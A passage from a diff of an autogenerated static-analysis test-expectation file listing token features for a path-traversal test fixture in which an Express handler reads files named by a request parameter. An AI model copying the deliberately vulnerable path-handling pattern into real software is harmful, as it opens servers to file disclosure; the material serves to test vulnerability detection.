exceptional return of pathMod ... aceDir) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:75 | exceptional return of pathMod ... aceDir) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:75 | exceptional return of pathMod ... aceDir) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:75 | exceptional return of pathMod ... aceDir) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:75 | exceptional return of pathMod ... aceDir) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:268:42:268:75 | pathMod ... aceDir) | CalleeFlexibleAccessPath | pathModule.relative | | autogenerated/TaintedPath/normalizedPaths.js:268:42:268:75 | pathMod ... aceDir) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:268:42:268:75 | pathMod ... aceDir) | calleeImports | path | @@ -9024,6 +76612,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:268:42:268:75 | pathMod ... aceDir) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:268:42:268:75 | pathMod ... aceDir) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:268:42:268:75 | pathMod ... aceDir) | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:268:53:268:61 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:268:53:268:61 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:268:53:268:61 | normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:268:53:268:61 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:268:53:268:61 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:268:63:268:74 | workspaceDir | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:268:63:268:74 | workspaceDir | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:268:63:268:74 | workspaceDir | calleeImports | path | @@ -9042,6 +76635,37 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:268:78:268:84 | newpath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:268:78:268:84 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:268:78:268:84 | newpath | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:18 | relativePath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:18 | relativePath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:18 | relativePath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:18 | relativePath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:18 | relativePath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:49 | exceptional return of relativ ... le.sep) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:49 | exceptional return of relativ ... le.sep) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:49 | exceptional return of relativ ... le.sep) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:49 | exceptional return of relativ ... le.sep) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:49 | exceptional return of relativ ... le.sep) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:49 | relativ ... le.sep) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:49 | relativ ... le.sep) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:49 | relativ ... le.sep) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:49 | relativ ... le.sep) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:49 | relativ ... le.sep) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:55 | relativ ... ) === 0 | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:55 | relativ ... ) === 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:55 | relativ ... ) === 0 | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:55 | relativ ... ) === 0 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:269:7:269:55 | relativ ... ) === 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:269:20:269:26 | indexOf | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:269:20:269:26 | indexOf | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:269:20:269:26 | indexOf | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:269:20:269:26 | indexOf | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:269:20:269:26 | indexOf | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:269:28:269:31 | '..' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:269:28:269:31 | '..' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:269:28:269:31 | '..' | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:269:28:269:31 | '..' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:269:28:269:31 | '..' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:269:28:269:31 | '..' | stringConcatenatedWith | -endpoint- pathModule.sep | | autogenerated/TaintedPath/normalizedPaths.js:269:28:269:48 | '..' + ... ule.sep | CalleeFlexibleAccessPath | relativePath.indexOf | | autogenerated/TaintedPath/normalizedPaths.js:269:28:269:48 | '..' + ... ule.sep | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:269:28:269:48 | '..' + ... ule.sep | calleeImports | path | @@ -9051,6 +76675,52 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:269:28:269:48 | '..' + ... ule.sep | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:269:28:269:48 | '..' + ... ule.sep | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:269:28:269:48 | '..' + ... ule.sep | receiverName | relativePath | +| autogenerated/TaintedPath/normalizedPaths.js:269:35:269:44 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:269:35:269:44 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:269:35:269:44 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:269:35:269:44 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:269:35:269:44 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:269:35:269:48 | pathModule.sep | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:269:35:269:48 | pathModule.sep | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:269:35:269:48 | pathModule.sep | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:269:35:269:48 | pathModule.sep | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:269:35:269:48 | pathModule.sep | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:269:35:269:48 | pathModule.sep | stringConcatenatedWith | '..' -endpoint- | +| autogenerated/TaintedPath/normalizedPaths.js:269:46:269:48 | sep | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:269:46:269:48 | sep | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:269:46:269:48 | sep | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:269:46:269:48 | sep | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:269:46:269:48 | sep | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:269:55:269:55 | 0 | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:269:55:269:55 | 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:269:55:269:55 | 0 | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:269:55:269:55 | 0 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:269:55:269:55 | 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:28 | exceptional return of fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:28 | exceptional return of fs.read ... ewpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:28 | exceptional return of fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:28 | fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:28 | fs.read ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:28 | fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:28 | fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:270:5:270:28 | fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:270:8:270:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:270:8:270:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:270:8:270:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:270:8:270:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:270:8:270:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:270:21:270:27 | newpath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:270:21:270:27 | newpath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:270:21:270:27 | newpath | calleeImports | fs | @@ -9060,6 +76730,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:270:21:270:27 | newpath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:270:21:270:27 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:270:21:270:27 | newpath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:28 | exceptional return of fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:28 | exceptional return of fs.read ... ewpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:272:5:272:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionBody | 